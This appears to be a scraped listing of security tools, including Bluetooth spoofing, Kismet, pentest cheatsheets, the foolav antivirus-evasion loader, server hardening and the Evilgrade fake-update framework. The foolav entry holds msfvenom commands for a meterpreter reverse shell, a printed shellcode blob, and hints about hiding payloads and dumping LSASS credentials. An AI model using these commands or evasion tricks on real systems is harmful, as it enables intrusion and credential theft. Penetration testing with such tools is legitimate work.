Automatic Bluetooth Spoofing - Spooftooph

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).

Features

ºClone and log Bluetooth device information
ºGenerate a random new Bluetooth profile
ºChange Bluetooth profile every X seconds
ºSpecify device information for Bluetooth interface
ºSelect device to clone from scan log


Automatic Bluetooth Spoofing: Spooftooph

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).

Spooftooph has several options for Bluetooth device information modification:

Option 1: Continuously scan an area for Bluetooth devices. Make a selection on which device in the list to clone. This option also allows for logging of the scanned devices.

Option 2: Randomly generate and assign valid Bluetooth interface information. The class and address are randomly generated and the name is derived from a list of the top 100 most common names in US and the type of device. For example if the randomly generated class is a phone, SpoofTooph might generate the name “Bob’s Phone”.

Option 3: Specify the name, class, and address a user wishes for the Bluetooth interface to have.

Option 4: Read in the log of previous scans and select a device to clone. Users can also manually add Bluetooth profiles to these log files.

Option 5: Incognito mode. Scan for and clone new devices at user assigned intervals.

This tool is heavily based on bdaddr (by Marcel Holtmann) and hciconfig (by Qualcomm Incorporated, Maxim Krasnyansky, and Marcel Holtmann) from BlueZ.



Usage

To modify the Bluetooth adapter, spooftooth must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.

spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c

2) Randomly generate NAME, CLASS and ADDR.

spooftooph -i hci0 -R

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.

spooftooph -i hci0 -s -w file.csv

4) Load in device info from log file and specify device info to clone.

spooftooph -i hci0 -r file.csv

5) Clone a random devices info in range every X seconds.


spooftooph -i hci0 -t 10

Download Spooftooph

Read More

Wireless Network Monitoring Tool - Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones (see below), there’s only one supported wireless hardware available as packet source.


Wireless Network Monitoring Tool

ºEthereal/Tcpdump compatible data logging
ºAirsnort compatible weak-iv packet logging
ºNetwork IP range detection
ºBuilt-in channel hopping and multicard split channel hopping
ºHidden network SSID decloaking
ºGraphical mapping of networks
ºClient/Server architecture allows multiple clients to view a single
ºKismet server simultaneously
ºManufacturer and model identification of access points and clients
ºDetection of known default access point configurations
ºRuntime decoding of WEP packets for known networks
ºNamed pipe output for integration with other tools, such as a layer3 IDS like Snort
ºMultiplexing of multiple simultaneous capture sources on a single Kismet instance
ºDistributed remote drone sniffing
ºXML output
ºOver 20 supported card types

Kismet differs from other wireless network detectors in working passively. Namely, without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and to associate them with each other. It is also the most widely used and up to date open source wireless monitoring tool.

An explanation of the headings displayed in Kismet. Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.

Kismet features the ability to log all sniffed packets and save them in a tcpdump/Wireshark or Airsnort compatible file format. Kismet can also capture “Per-Packet Information” headers. Kismet also features the ability to detect default or “not configured” networks, probe requests, and determine what level of wireless encryption is used on a given access point.

In order to find as many networks as possible, kismet supports channel hopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence with a default value that leaves big holes between channels (for example, 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage with this method is that it will capture more packets because adjacent channels overlap.


Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.

Download Kismet

Read More

Pentest - Security Cheatsheets

Security Cheatsheets

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

Requirements

The only requirement to use these cheatsheets is for cheat to be installed.

How to Use

In order to use these cheatsheets, the cheatsheets in this repository need to go into ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

Download Security Cheatsheets

Read More

Antivirus Evasion - foolav

foolav

Executable compiled with this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file into the same directory.


Usage steps

1. prepare your payload (x86), i.e.

calc:  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you dont really need to use any encoder or characters blacklisting, it will work anyway)

meterpreter:  msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

2. copy payload file [executable-name-without-exe-extension].mf in the same directory as executable payload running calc.exe generated using above command:  # calc.exe \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84 


3. once executable is run, payload file will be parsed, loaded into separate thread and executed in memory:

Hints


ºx86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86  architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64  processes. After that, load kiwi will load x86_64 version making it possible to access juicy  contents of LSASS process memory :)

º.mf payload file can be obfuscated - parser will ignore every character other than \xHH  hexdecimal sequences. This means, it can append your payload to almost any file, hide it  between the lines or even add your own comments, example:

Download foolav

Read More

Razorback

The new Razorback platform developed by Sourcefire is basically a tool for tying together the various layers of detection within an organization, including antivirus, IDS/IPS, Web and email gateways, and firewalls, to use in concert to catch and examine potential threats and create mitigations on the fly.

Its creators say it’s not the same thing as a security information management tool, however, because it does more than capture events: “SIM collects events in a vacuum: It takes an AV event and says this host is infected by a virus … It doesn’t know anything about that piece of malware on the box,” says Matt Watchinski, senior director of Sourcefire’s vulnerability research team.

Download Razorback

Read More

LAMP/LEMP Secure Deployment - JShielder

JSHielder is an Open Source tool developed to help SysAdmin and developers secure there Linux Servers in which they will be deploying any web application. This tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server with little interaction from the user.

This tool is a Bash Script with a little python script that hardens the Linux Server security automatically and the steps followed are:

• Configures a Hostname
• Reconfigures the Timezone
• Updates the entire System
• Creates a New Admin user so you can manage your server safely without the need of doing remote connections with root.
• Generates Secure RSA Keys, so that remote access to your server is done exclusive from you local pc and no Conventional password
• Configures, Optimize and secures the SSH Server
• Configures IPTABLES Rules to protect the server from common attacks
• Protects the server against Brute Force attacks by installing a configuring fail2ban
• Stop Portscans by blocking intrusive IP via IPTABLES using portsentry
• Install, configure, and optimize MySQL
• Install the Apache Web Server
• Install, configure and secure PHP
• Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
• Installs RootKit Hunter
• Secures Root Home and Grub Configuration Files
• Installs Unhide to help Detect Malicious Hidden Processes
• Installs Tiger, A Security Auditing and Intrusion Prevention system
• Restrict Access to Apache Config Files
• Disable Compilers
• Creates Daily Cron job for System Updates
• Kernel Hardening via sysctl configuration File

Recently Added Hardening Steps

• Added PHP Suhosin Installation to protect PHP Code and Core for Known and Unknown flaws
• Use of Function for code execution customization
• Distro Selection Menu
• Function Selection Menu
• Deployment Selection Menu (LAMP, LEMP, Reverse Proxy)
• Added LEMP Deployment with ModSecurity
• Added /tmp folder Hardening
• Added PSAD IDS installation
• Added Process Accountingcd ..
• Added Unattended Upgrades
• Added MOTD and Banners for Unauthorized access
• Disable USB Support for Improved Security (Optional)
• Restrictive Default UMASK
• Added Additional Hardening Steps

To Run the tool

./jshielder.sh

As the Root user

ChangeLog

v2.0 More Deployment Options, Selection Menu, PHP Suhosin installation, Cleaner Code,

v1.0 - New Code

Download JShielder

Read More

Wordlist Generator - Crunch

Wordlist Generator: Crunch

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.


Features

ºcrunch1crunch generates wordlists in both combination and permutation ways
ºit can breakup output by number of lines or file size
ºnow has resume support
ºpattern now supports number and symbols
ºpattern now supports upper and lower case characters separately
ºadds a status report when generating multiple files
ºnew -l option for literal support of @,%^
ºnew -d option to limit duplicate characters see man file for details
ºnow has unicode support

Download Crunch

Read More

SIP Witch

SIP Witch


GNU SIP Witch is a secure peer-to-peer VoIP server that uses the SIP protocol. Calls can be made peer-to-peer behind NAT firewalls, and without needing a service provider. GNU SIP Witch supports using secure telephone extensions, for placing and receiving calls directly over the Internet, and intercept-free peer-to-peer audio and video extensions. GNU SIP Witch also is being introduced as a desktop VoIP mediation service to enable the construction of participatory bottom-up secure calling networks and to enable replacement of Skype with free software and published protocols. As a desktop mediation service, GNU SIP Witch can solve issues like NAT in one place for all user agents, and offer new ways to route and redirect VoIP much like gstreamer does for desktop media.

GNU Bayonne is the telephony server of GNU Telephony and the GNU Project. The production release of GNU Bayonne 1 is 1.2.15 and has a long history in production telecommunication environments. GNU Bayonne supports IVR scripting using hardware from Voicetronix, Dialogic, Aculab, CAPI drivers, and Quicklink drivers under GNU/Linux. GNU Bayonne 1 can integrate perl and python applications, and has been commercially deployed in production use for several years. Future releases of GNU Bayonne will be based on ucommon and will further explore it’s role as a Telephony integration server.

GNU SIP Witch is a call and registration server for the SIP protocol. As a call server it services call registration for SIP devices and destination routing through SIP gateways. GNU SIP Witch does not perform codec operations or media proxying and thereby enables SIP endpoints to directly peer negotiate call setting and process peer to peer media streaming even when when multiple SIP Witch call nodes at multiple locations are involved. This means GNU SIP Witch operates without introducing additional media latency or offering a central point for media capture.

GNU SIP Witch is designed to support network scaling of telephony services, rather than the heavily compute-bound solutions we find in use today. This means a call node has a local authentication/registration database, and this will be mirrored, so that any active call node in a cluster will be able to accept and service a call. This allows for the possibility of live failover support in the future as well.

GNU SIP Witch is not a SIP “router”, and does not try to address the same things as a project like iptel “Ser”. GNU SIP Witch is being designed to create on-premise SIP telephone systems, telecenter servers, and Internet hosted SIP telephone systems. One important feature will include use of URI routing to support direct peer to peer calls between service domains over the public internet without needing mediation of an intermediary “service provider” so that people can publish and call sip: uri’s unconstrained. GNU SIP Witch is about freedom to communicate and the removal of artifical barriers and constraints whether imposed by monopoly service providers or by governments.

Download SIP Witch

Read More

Injecting Fake Updates - Evilgrade

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it’s own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.


When should I use evilgrade?

This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim’s dns traffic), and such thing can be done on 2 scenarios:

Injecting Fake Updates: Evilgrade

ºInternal DNS access
ºARP spoofing
ºDNS Cache Poisoning
ºDHCP spoofing
ºTCP hijacking
ºWi-Fi Access Point impersonation


External scenery:

ºInternal DNS access
ºDNS Cache Poisoning


How does it work?

Evilgrade works with modules, in each module there’s an implemented structure which is needed to emulate a fake update for an specific application/system.


What OS are supported?

ISR-Evilgrade is crossplatform, it only depends of having an appropriate payload for the right target platform to be exploited.


Implemented modules:

ºFreerip 3.30
ºJet photo 4.7.2
ºTeamviewer 5.1.9385
ºISOpen 4.5.0
ºIstat.
ºGom 2.1.25.5015
ºAtube catcher 1.0.300
ºVidbox 7.5
ºCcleaner 2.30.1130
ºFcleaner 1.2.9.409
ºAllmynotes 1.26
ºNotepad++ 5.8.2
ºJava 1.6.0_22 winxp/win7
ºaMSN 0.98.3
ºAppleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
ºMirc 7.14
ºWindows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
ºDap 9.5.0.3
ºWinscp 4.2.9
ºAutoIt Script 3.3.6.1
ºClamwin 0.96.0.1
ºAppTapp Installer 3.11 (Iphone/Itunes)
getjar (facebook.com)
ºGoogle Analytics Javascript injection
ºSpeedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
ºWinamp 5.581
ºTechTracker (cnet) 1.3.1 (Build 55)
ºNokiasoftware firmware update 2.4.8es – (Windows software)
ºNokia firmware v20.2.011
ºBSplayer 2.53.1034
ºApt ( < Ubuntu 10.04 LTS)
ºUbertwitter 4.6 (0.971)
ºBlackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
ºCpan 1.9402
ºVirtualBox (3.2.8 )
ºExpress talk
ºFilezilla
ºFlashget
ºMiranda
ºOrbit
ºPhotoscape.
ºPanda Antirootkit
ºSkype
ºSunbelt
ºSuperantispyware
ºTrillian <= 5.0.0.26
ºAdium 1.3.10 (Sparkle Framework)
ºVMware
ºmore…
º/docs/CHANGES

Download Evilgrade

Read More